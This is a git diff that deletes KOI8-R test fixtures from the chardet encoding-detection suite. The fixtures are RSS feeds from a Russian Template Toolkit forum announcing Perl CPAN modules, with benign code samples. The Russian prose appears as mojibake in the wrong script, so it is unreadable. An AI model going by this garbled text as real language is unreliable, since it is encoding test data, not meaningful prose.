׀ֱ׀ֱֻ &quot;מֿ׳ֿ׃װֹ Template Toolkit&quot;, ׳ ֻֿװֿֿׂ ׀ִֵֵֹֹֿׂ׃ֹֻ ֲױִױװ ֲֿ־ֿ׳ּׁװ״׃ׁ ֱַּֿֿ׳ֹֻ ־ֿ׳ָ װֵֽ ׳ ֶֿׂױֵֽ &quot;מֿ׳ֿ׃װֹ Template Toolkit&quot;. - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-40.html - ןֲ׃ױײִֵ־ֵֹ ֶֿׂױֱֽ - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - Wed, 21 Jul 2004 14:52:30 GMT - ׀ִֿ׀ֹ׃״ [חֿ׃װ״] - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - ‏װֿ-װֿ ־ֵ ׃ֿ׳׃ֵֽ ׀ֿ־ׁװ־ֵֿ װ׳ֹֿׂװ׃ׁ.<br /> -םֵ־ׁ ֱׂ׃׀ֿ־ֱֵװ ׃ֹ׃װֱֵֽ ֱֻֻ Light Elf, ־ֿ ֹֽֿ ׃ֲֵֿֿ־ֹׁ ׀ְֱֵֽֿװ׃ׁ ־ֱִ׀ֹ׃״ְ [חֿ׃װ״].<br /> -<br /> -װֿ װֱֻ ־ֱִֿ? - - Light Elf <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-8.html - ןֲ׃ױײִֵ־ֵֹ ֶֿׂױֱֽ - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - Tue, 20 Jul 2004 15:02:45 GMT - נֲֵּֿׂ ׳ ׃ֲֵֿֿ־ָֹׁ - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - ו׃װ״ ׀ִֵּֿׂײֵ־ֵֹ ־ֵ ױֱִּׁװ״ ׀ֲֵּֿׂ.<br /> -׃ ָֹ ׀ֽֿֿ״ְ ױֲִֿ־ֿ ֱֶֽֿׂװֹֿׂ׳ֱװ״ װֵֻ׃װ.<br /> -ן׃ֲֵֿ־־ֿ ִֻֿ. - - Light Elf <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-7.html - ןֲ׃ױײִֵ־ֵֹ ֶֿׂױֱֽ - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - Wed, 14 Jul 2004 06:13:38 GMT - ה׳ֹײֻֿ ֶֿׂױֱֽ - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - ס ־ֵ ׃ֿ׳׃ֵֽ ׀ֿ־ּׁ. <br /> -ֱֲֵֻּֽֽ ׃׳ֵָׂױ &quot;powered by [%TT2%]&quot; ֿ־ֱֱֵװ װֿ װֿװ ֶֿׂױֽ ׃ֱִֵּ־ ־ֱ TT2? - - UncleAndy <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-4.html - ןֲ׃ױײִֵ־ֵֹ ֶֿׂױֱֽ - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - Mon, 12 Jul 2004 04:25:44 GMT - זֿׂױֽ ֿװֻׂװ - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - 12 ְֹּׁ 2004 ֱִַֿ ֿװֹֻּׂ׃״ <span style="font-weight:bold">ֶֿׂױֽ Template Toolkit</span>. נְֱֱַֹּׂ ׳׃ֵָ ֹ־װֵֵׂ׃ױְָֹ׃ׁ ֹ ֹ׃׀ּֿ״ױְָֹ ׳ ֱֲֿׂװֵ ֲֲֹֹּֿװֵֻױ Template Toolkit ֻ ױֱ׃װְֹ.<br /><br />םֹֿ ֱֱֲִַּֿׂ־ֿ׃װֹ:<br /><br />הֹֽװְֹׂ מֱֵֹֻּֿ׳ױ ֱ ׀ִִֵֿׂײֻױ, ֱׂ׃׃ֻּױ ֵֵׂ ׀ִֿ׀ֹ׃ֻױ Subscribe.Ru ׃װֱװ״ֹ ֿ Template Toolkit, ׀ִֵֿׂ׃װֱ׳ֵּ־ֵֹ ֶֿׂױֱֽ <a target="_blank" href="http://perl.dp.ua/cgi-bin/forum.pl?do=show&tema=1&page=1">Perl - תֱִָֹֿ ֹ ױֹ׃״</a> ׳ ֱֵֻ׃װ׳ֵ ֶֿׂױֱֽ ׀ִִֵֿׂײֹֻ ׃ֱװֱ <a target="_blank" href="http://www.template-toolkit.ru/">Template Toolkit (ׂױ׃׃ֱֻׁ ֱֳִֵֹֻׁׂ)</a>.<br /><br />קֱִֹֽױ ףױֱָ־ֿ׳ױ ֱ ׀ִִֵֿׂײֻױ ֹ ְִֵֹ ׃ֱִֿ־ֹׁ װָֹ ֶֿׂױֽֿ׳.<br /><br />מְֱִֵ׃״, װֿ ֶֿׂױֽ ׃װֱ־ױװ ׀ֵּֿ־ֹֽ ִּׁ װֵָ, ֻװֿ ֹ׃׀ּֿ״ױֵװ ֹֹּ ׃ֱֲֵֹֿׂװ׃ׁ ֹ׃׀ּֿ״ֿ׳ֱװ״ ׳ ׃׳ָֹֿ ֱֱֲֿׂׂװֱָֻ ֲֲֹֹּֿװֵֻױ ׀ֿ ֱֲֿׂװֵ ׃ ֱֲּֿ־ֱֹֽ Template Toolkit. ף׀ֱֹׂ׳ֱװֵ, ִֵֹּװֵ׃״, ֲֿ׃ױײֱִװֵ.<br /><br /><span style="font-weight:bold">ףװׂױֻװױֱׂ ֶֿׂױֱֽ ׀ִֵׂ׳ֱֹׂװֵּ״־ֱׁ</span>. ס ַֿװֿ׳ ׳׃ּױֱװ״ ֹ ױֵ׃װ״ ׳׃ֵ ׀ִֵּֿׂײֵ־ֹׁ ׀ֿ ׃ֱִֿ־ְֹ ־ֿ׳ָ ׳ֵװֻֿ ׳ ֱֱָֻֽׂ ֶֿׂױֽֿ׳ Template Toolkit.<br /><br />ףֱֽ ֶֿׂױֽ ־ֱ׀ֹ׃ֱ־ ׃ ֹ׃׀ּֿ״ֿ׳ֱ־ֵֹֽ Template Toolkit ֹ ֲױִֵװ ֱֱֲִֿׂװ׳ֱװ״׃ׁ. ק׃ֵ ֱֱֵֽ־ֹׁ ֹ ׀ִֵּֿׂײֵ־ֹׁ ׀ֹׂ׳ֵװ׃װ׳ױְװ׃ׁ. - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-1.html - ןֲ׃ױײִֵ־ֵֹ ֶֿׂױֱֽ - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - - - diff --git a/chardet/tests/KOI8-R/forum.template-toolkit.ru.6.xml b/chardet/tests/KOI8-R/forum.template-toolkit.ru.6.xml deleted file mode 100644 index e80103c..0000000 --- a/chardet/tests/KOI8-R/forum.template-toolkit.ru.6.xml +++ /dev/null @@ -1,486 +0,0 @@ - - - - - זֿׂױֽ Template Toolkit : מֿ׳ֿ׃װֹ Template Toolkit - http://forum.template-toolkit.ru/view_forum/forum_id-6.html?rss - Template Toolkit - ֲ׃װֱׁׂ, ֽֿ־ֱׁ ֹ ֱׂ׃ֱֵֹֽׁׁׂ ׃ֹ׃װֱֵֽ ֱֲֲֿֿׂװֹֻ ֱֲּֿ־ֿ׳. מֱ ׃ֱװֵ ֱֲֿׂװֱֵװ ֶֿׂױֽ, ׳ ֻֿװֽֿֿׂ ֲֿ׃ױײְֱִװ׃ׁ ׳ֿ׀ֿׂ׃ ֹ׃׀ּֿ״ֿ׳ֱ־ֹׁ ֲֲֹֹּֿװֵֹֻ ׀ֿ ֱֲֿׂװֵ ׃ ֱֲּֿ־ֱֹֽ. ב־ֿ־׃ ֹ ־ֿ׳ֿ׃װֹ, ׃׳ֱׁ־־ֵ ׃ Template Toolkit. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Mon, 26 Dec 2005 16:28:41 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ֱֲּֿ־ ׳ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - Mon, 19 Dec 2005 14:49:49 GMT - Template::Provider::FromDATA - ֱַׂױֱֻ ֱֲּֿ־ֿ׳ ֹ ׃ֳֵֹֹֻ __DATA__ - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ֱ ׳ֵׂ׃ֹׁ 0.04 <a target="_blank" href="http://search.cpan.org/~bricas/Template-Provider-FromDATA/">ִֽֿױּׁ Template::Provider::FromDATA</a>, ֻֿװֿׂ ׀ֿ׳ֵּֿׁװ ֱָׂ־ֹװ״ ֱֲּֿ־ ׳ֵֽ׃װֵ ׃ ִֻֽֿֿ ׳ ִֿ־ֽֿ ֱֵֶּ (׃ֳֵֹֻׁ __DATA__).<br /><br />הּׁ ֹ׃׀ּֿ״ֿ׳ֱ־ֹׁ ֱִ־־ַֿֿ ִֽֿױּׁ ־ֲִֵָֹֽֿֿֿ ׳־ֱֱֵּ ׃ֱִֿװ״ ֵֻֽ׀ּׁׂ ׀ֿׂ׳ֱֱִֵׂ Template::Provider::FromDATA, ֱ ֱװֵֽ ױֱֱֻװ״ ֵַֿ ׳ ֱֵֻ׃װ׳ֵ ׀ֿ׃װֱ׳ֱֹֻ ֱֲּֿ־ֿ׳ ׳ ֻֿ־׃װׂױֻװֵֿׂ Template:<br /><br /><div class="code"><pre>use Template; -use Template::Provider::FromDATA; - -# ףֱִֿ£ֽ ֲֵֻֿװ ׀ֿ׃װֱ׳ֱֹֻ -my $provider = Template::Provider::FromDATA-&gt;new( { - CLASSES =&gt; __PACKAGE__ -} ); - -# ץֱֻ׳ֱֵֽ ֲֵֻֿװ ׀ֿ׃װֱ׳ֱֹֻ ׳ ֿ׀ֳֹׁ ֻֿ־׃װׂױֻװֱֿׂ Template -my $template = Template-&gt;new( { - # ... - LOAD_TEMPLATES =&gt; [ $provider ] -} ); - -# ...׃ֱֹֽ ֱֲּֿ־ ׳ ׃ֳֵֹֹֻ __DATA__ - -__DATA__ - -__mytemplate__ -Foo [% bar %] - -__myothertemplate__ -Baz, [% qux %]?</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-122.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - Mon, 19 Dec 2005 14:10:59 GMT - Template::Plugin::HTML::Strip - ױֱִֵּ־ֵֹ HTML-װֵַֿ׳ ֹ װֵֻ׃װֱ - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ֱ ׳ֵׂ׃ֹׁ 0.01 ִֽֿױּׁ <a target="_blank" href="http://search.cpan.org/~gsimmons/Template-Plugin-HTML-Strip/">ִֽֿױּׁ Template::Plugin::HTML::Strip</a>. םִֿױּ״ ׀ִֵֿׂ׃װֱ׳ֵּׁװ ׀ֱַֹּ־, ֻֿװֿׂ ׀ֿ׳ֵּֿׁװ ױֱִּׁװ״ ֹ װֵֻ׃װֱ HTML-װֵַֹ.<br /><br /><div class="code"><pre>[% USE HTML.Strip %] - -[% FILTER html_strip %] -&lt;title&gt;People for the Preservation of Presentational Markup&lt;/title&gt; -&lt;h1&gt;HTML::Strip - A cause for concern?&lt;/h1&gt; -[% END %] - -[% USE HTML.Strip 'strip' - striptags = [ 'script' 'iframe' ] - emit_spaces = 0 -%] - -[% FILTER strip %] -&lt;p&gt;A call to arms against the removal of our elements!&lt;/p&gt; -[% END %]</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-121.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - Sun, 6 Nov 2005 08:46:17 GMT - Template::Plugin::Subst - ֱֵֽ־ֱ װֵֻ׃װֱ ׃ ׀ֽֿֿ״ְ ֵַׂױּׁׂ־ָ ׳ֱׂײֵ־ֹ - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ <a target="_blank" href="http://search.cpan.org/~nikc/Template-Plugin-Subst/">ִֽֿױּ״ Template::Plugin::Subst</a>, ֻֿװֿׂ ׀ֿ׳ֵּֿׁװ ׳׀ּֿ־ׁװ״ ֱֵֽ־ ׳ װֵֻ׃װֵ ׃ ֹ׃׀ּֿ״ֿ׳ֱ־ֵֹֽ ֵַׂױּׁׂ־ָ ׳ֱׂײֵ־ֹ.<br /><br />י׃׀ּֿ״ֿ׳ֱ־ֵֹ ׳ֹׂװױֱּ״־ַֿֿ ֵֽװֱִֿ <span style="font-weight:bold">subst</span><br /><div class="code"><pre>[% USE Subst %] -[% str = 'ֹּֿ ־ֱ ּֽֿ' %] -[% str.subst('(ֹּֿ|ּֽֿ) ־ֱ (ּֽֿ|ֹּֿ)', '$2 ־ֱ $1', 1) %]</pre></div><br /><br />י׃׀ּֿ״ֿ׳ֱ־ֵֹ ֶֹּ״װֱׂ<br /><div class="code"><pre>[% USE filt = Subst - pattern = '(ֹּֿ|ּֽֿ) ־ֱ (ּֽֿ|ֹּֿ)' - replacement = '$2 ־ֱ $1' - global = 1 %] -[% FILTER $filt %] -ֹּֿ ־ֱ ּֽֿ -[% END %]</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-115.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - Sat, 1 Oct 2005 06:52:16 GMT - Template::Plugin::ASCIITable - ׳׳ִֿ װֵֻ׃װֿ׳ָ װֱֲֳֹּ - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ֱ ׳ֵׂ׃ֹׁ 0.1 <a target="_blank" href="http://search.cpan.org/~dakkar/Template-Plugin-ASCIITable/">ִֽֿױּׁ Template::Plugin::ASCIITable</a>, ֻֿװֿׂ ׀ֿ׳ֵּֿׁװ ֹׂ׃ֿ׳ֱװ״ װֵֻ׃װֿ׳ֵ װֱֲֳֹּ.<br /><br /><div class="code"><pre>[% - USE ASCIITable; - ASCIITable.cols('a', 'b', 'c'); - ASCIITable.rows([1,2,3],['one','two','three']); - ASCIITable.draw() -%]</pre></div><br />ק׳ִֿ:<br /><br /><div class="code"><pre> -.=----+-----+------=. -| a | b | c | -|=----+-----+------=| -| 1 | 2 | 3 | -| one | two | three | -'=----+-----+------='</pre></div><br /><br />נֱַֹּ־ ׀ֿ׳ֵּֿׁװ ־ֱ׃װֱֹׂ׳ֱװ״ ׀ֱֱֵֽׂװׂ װֱֲֳֹּ, ֱ װֱֻײֵ ׃ֱִֿ׳ֱװ״ ׃ֲֿ׃װ׳ֵ־־ֵ ׃װֹֹּ ֱֻֽֿׂ. - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-111.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - Thu, 21 Jul 2005 05:47:32 GMT - Template::Plugin::Perl - ֻ׃׀ֿׂװ ֱִׁׂ ֶױ־ֳֹֻ Perl ׳ ֱֲּֿ־ - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ <a target="_blank" href="http://search.cpan.org/~agent/Template-Plugin-Perl/">ִֽֿױּ״ Template::Plugin::Perl</a>, ׀ִֵֿׂ׃װֱ׳ְֹּׁ ִׁׂ ׀ֵּֿ־ָ ֶױ־ֳֹֻ Perl.<br /><br /><div class="code"><pre>[% USE Perl %] -[% Perl.log(100) %] -[% Perl.rand(1) %] -[% Perl.exp(2) %] -[% Perl.sprintf(&quot;%.0f&quot;, 3.5) %] -[% Perl.pow(2, 3) %] # 2 ** 3; -[% Perl.eval('2**3') %] -[% Perl.sin(3.14) %] -[% Perl.cos(0) %] -[% Perl.join(',', 'a', 'b', 'c') %] -[% list = ['a','b','c']; - Perl.join(',' list) %]</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-102.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - Thu, 21 Jul 2005 04:37:32 GMT - Template::Plugin::POSIX - POSIX ֶױ־ֳֹֹֻ ׳ ֱֲּֿ־ֱָ - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ <a target="_blank" href="http://search.cpan.org/~agent/Template-Plugin-POSIX/">ִֽֿױּ״ Template::Plugin::POSIX</a>. םִֿױּ״ ׀ֿ׳ֵּֿׁװ ֹ׃׀ּֿ״ֿ׳ֱװ״ ׳ ֱֲּֿ־ֱָ ֶױ־ֳֹֹֻ POSIX.<br /><br /><div class="code"><pre>[% USE POSIX %] -[% POSIX.log(100) %] -[% POSIX.rand(1) %] -[% POSIX.exp(2) %] -[% POSIX.sprintf(&quot;%.0f&quot;, 3.5) %] -[% POSIX.pow(2, 3) %] -[% POSIX.ceil(3.8) %] -[% POSIX.floor(3.8) %] -[% POSIX.sin(3.14) %] -[% POSIX.cos(0) %]</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-101.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - Mon, 11 Jul 2005 04:05:37 GMT - Template::Plugin::Decode - ׀ֱֲֵֿֿׂׂ׳ֱ־ֵֹ ׳׳ֱִֿ ׳ Unicode - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ <a target="_blank" href="http://search.cpan.org/~lyokato/Template-Plugin-Decode/">ִֽֿױּ״ Template::Plugin::Decode</a>, ֻֿװֿׂ ׀ִֵֿׂ׃װֱ׳ֵּׁװ ׃׀ֿ׃ֲֿ ׀ִֵֵּֿֿׂװ״ ׃ּֿײ־ֿ׃װֹ ׃ ֹ׃׀ּֿ״ֿ׳ֱ־ֵֹֽ ׳ ֱֲּֿ־ֱָ UTF-8.<br /><br /><div class="code"><pre>ק־ֱֱֵּ [% USE Decode %]. -תֱװֵֽ ֽֿײ־ֿ ֹ׃׀ּֿ״ֿ׳ֱװ״ ֶֹּ״װׂ 'decode'. -װֿװ ֶֹּ״װׂ ׀ֱֲֵֿׂׂױֵװ ׃װֻֿׂױ ֹ UTF-8 ׳ֿ ׳־ױװֵׂ־־ֹ unicode-ֱֶֽֿׂװ Perl: -[% multibyte_str | decode %]</pre></div><br />ב׳װֿׂ ִֽֿױּׁ ׀ֱֱִֵֵַּׂװ ׃ִֵּױְֹ ׀ִִָֿֿ. ק ֱֵֻ׃װ׳ֵ ִֹֻֿֿׂ׳ֹֻ ֱֲּֿ־ֿ׳ ֹ׃׀ּֿ״ױֵװ׃ׁ UTF-8. זֱּ ִּֿײ־ ׃ִֵֿׂײֱװ״ BOM-ֱ׀ֹ׃״. ק׃ֵ ׳ִָֿ־ֵ ֱִ־־ֵ ִִֵֹֻֿׂױְװ׃ׁ ֶֹּ״װֽֿׂ decode. - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-96.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - Sat, 2 Jul 2005 06:41:54 GMT - Template::Plugin::XSLT - XSLT-׀ֱֲֵֿֿׂׂ׳ֱ־ֵֹ XML - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ֱ ׳ֵׂ׃ֹׁ 1.2 <a target="_blank" href="http://search.cpan.org/~scott/Template-Plugin-XSLT/">ִֽֿױּׁ Template::Plugin::XSLT</a>, ׳ ֻֿװֽֿֿׂ ֱֵֹּֿׂ׳ֱ־ ֶֹּ״װׂ, ׀ֿ׳ְֹּֿׁ ׀ֹֿׂ׳ִֹֿװ״ XSLT-׀ֱֲֵֿֿׂׂ׳ֱ־ֹׁ ֱֵֶַֽׂ־װֱ XML.<br /><br /><div class="code"><pre>[% USE transform = XSLT(&quot;stylesheet.xsl&quot;); %] - ... -[% foo.as_xml | $transform foo = '&quot;bar&quot;' baz = 123 %]</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-94.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - Tue, 24 May 2005 11:28:04 GMT - Template::Plugin::NakedBody - ׳ִֵֵּ־ֵֹ BODY-׃ֿ׃װֱ׳ְֵּׁ HTML-ִֻֿױֵֽ־װֱ - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ֱ ׳ֵׂ׃ֹׁ 0.02 <a target="_blank" href="http://search.cpan.org/~adamk/Template-Plugin-NakedBody/">ִֽֿױּׁ Template::Plugin::NakedBody</a>. הֱ־־ ִֽֿױּ״ ֱֵֹּׂױֵװ ֶֹּ״װׂ, ֻֿװֿׂ ׳ִֵֵּׁװ ׃ִֵֿׂײֵֹֽֿ HTML-ִֻֿױֵֽ־װֱ ֵֽײִױ װֱֵַֹֽ &lt;BODY&gt; ֹ &lt;/BODY&gt;. כֱֻ ־ֱ׀ֹ׃ֱ־ֿ ׳ ִֻֿױֵֽ־װֱֳֹֹ װֿ ֱֻֿ׳ֱֵװ׃ׁ ױֲִֿ־ֿ ׀ֹׂ ֱֲֿׂװֵ ׃ ֱִֹ־ֱֵֹֽׂ. נֹׂ ׳ְֵֻּ־ֹֹ ׀ִַֿֿװֿ׳ֵּ־־ָ ֹֹֽ ִֻֿױֵֽ־װֿ׳ ־ֵװ ־ֲִֵָֹֽֿֿֿ׃װֹ ִֿ׀ּֿ־ֹװֵּ״־ֿ ֱִֵֻׂװֹֿׂ׳ֱװ״ ִֻֿױֵֽ־װ.<br /><br /><div class="code"><pre># included.html -# ק html-ֱִֵֻׂװֵֿׂ ױֲִֿ־ֿ ֱֲֿׂװֱװ״ ׃ ׀ּֿ־ֽ ִֻֿױֵֽ־װֽֿ -&lt;html&gt; -&lt;head&gt; -&lt;style ...&gt; -&lt;/head&gt; -&lt;body&gt; -‏װֲֿ ׳ִֵֹװ״ ׀ֱׂ׳ֹּ״־ֿ װֿװ ֻֿ־װֵ־װ ־ױײ־ װֱֲֳֹּ ׃װֵֹּ. -&lt;/body&gt; -&lt;/html&gt; - -# mypage.html -[% USE NakedBody %] -&lt;html&gt; -&lt;head&gt; -&lt;style ...&gt; -&lt;/head&gt; -&lt;body&gt; -כֿ־װֵ־װ ֹ׃ִָֿ־ַֿֿ ִֻֿױֵֽ־װֱ. -תֱװֵֽ ׳ְֱֵֻּװ׃ׁ ִֻֿױֵֽ־װ, ׀ִַֿֿװֿ׳ֵּ־־ ֱִֹ־ֵֽֿׂ. -[% INCLUDE included.html | NakedBody %] -נִּֿֿׂײֵ־ֵֹ ֹ׃ִָֿ־ַֿֿ ִֻֿױֵֽ־װֱ. -&lt;/body&gt; -&lt;/html&gt;</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-88.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - Sat, 21 May 2005 08:04:46 GMT - CGI::Application::Plugin::AnyTemplate - ֹ־װֵֵֶׂ׃ ֻ ֿ׃־ֿ׳־ֽ ׃ֹ׃װֱֵֽֽ ֱֲּֿ־ֿ׳ - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ֱ <a target="_blank" href="http://backpan.cpan.org/authors/id/M/MG/MGRAHAM/CGI-Application-Plugin-AnyTemplate-0.04.tar.gz">׳ֵׂ׃ֹׁ 0.04 ִֽֿױּׁ CGI::Application::Plugin::AnyTemplate</a>. הֱ־־ ִֽֿױּ״ ׃ִֵֿׂײֹװ ֲֲֵֿֿ־־ ֹ־װֵֵֶׂ׃ ִּׁ ֱֲֿׂװ ׃ ְֲּֿ ֹ׳ֵ׃װ־ֿ ׃ֹ׃װֵֽֿ ֱֲּֿ־ֿ׳ Perl (׳ ־ֱ׃װֹֿׁ ֵֽֽֿ־װ ׀ִִֵֿׂײֹ׳ְֱװ׃ׁ <span style="font-weight:bold">HTML::Template</span>, <span style="font-weight:bold">HTML::Template::Expr</span>, <span style="font-weight:bold">Petal</span> ֹ <span style="font-weight:bold">Template Toolkit</span>) ֹ ׀ֹּֿׂײֵ־ֹ, ֹ׃׀ּֿ״ױְָֹ ׳ ֱֵֻ׃װ׳ֵ ֻֿ־װֱֵּּֿׂׂ CGI::Application. - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-87.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - Sun, 15 May 2005 14:37:34 GMT - Inline::TT - ׳ְֵֻּ־ֵֹ ֱֲּֿ־ֿ׳ ׳ ׃ֹֻׂ׀װ - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - מֱ CPAN ֿ׀ױֲֹֻּֿ׳ֱ־ֱ ׳ֵׂ׃ֹׁ 0.04 <a target="_blank" href="http://search.cpan.org/~philcrow/Inline-TT/">ִֽֿױּׁ Inline::TT</a>, ֻֿװֿׂ ׀ֿ׳ֵּֿׁװ ׳ְֱֻּװ״ ֱֲּֿ־ ׳ ׃ֹֻׂ׀װ ׃ ׃ֱָֿׂ־ֵ־ֵֹֽ ׳ֽֿֿײ־ֿ׃װֹ ֵֹֻֿׂ׳ֱ־ֹׁ ֿװֻֽֿ׀ֹֹּֿׂ׳ֱ־־ָ ֱֲּֿ־ֿ׳.<br /><br /><div class="code"><pre> -use Inline TT =&gt; 'DATA'; - -# ֵֹֽ־ֱ ֲֻּֿֿ׳ ֻ׃׀ֿׂװֹׂױְװ׃ׁ ֱֻֻ ֶױ־ֳֹֹֻ -print hello( { name =&gt; 'Rob' } ), &quot;\n&quot;; -print goodbye( { name =&gt; 'Rob' } ), &quot;\n&quot;; - -__DATA__ -__TT__ -[% BLOCK hello %] -&lt;H1&gt; Hello [% name %], how are you? &lt;/H1&gt; -[% END %] -[% BLOCK goodbye %] -&lt;H1&gt; Goodbye [% name %], have a nice day. &lt;/H1&gt; -[% END %]</pre></div><br /><div class="code"><pre>use Inline TT =&gt; &lt;&lt; EO_TEMPLATE -[% BLOCK hello %] -&lt;H1&gt; Hello [% name %], how are you? &lt;/H1&gt; -[% END %] -[% BLOCK goodbye %] -&lt;H1&gt; Goodbye [% name %], have a nice day. &lt;/H1&gt; -[% END %] -EO_TEMPLATE - -print hello( { name =&gt; 'Rob' } ), &quot;\n&quot;; -print goodbye( { name =&gt; 'Rob' } ), &quot;\n&quot;;</pre></div> - - לֱֲֿ־ֿ׳ יַֿׂ״ <authors@template-toolkit.ru> - 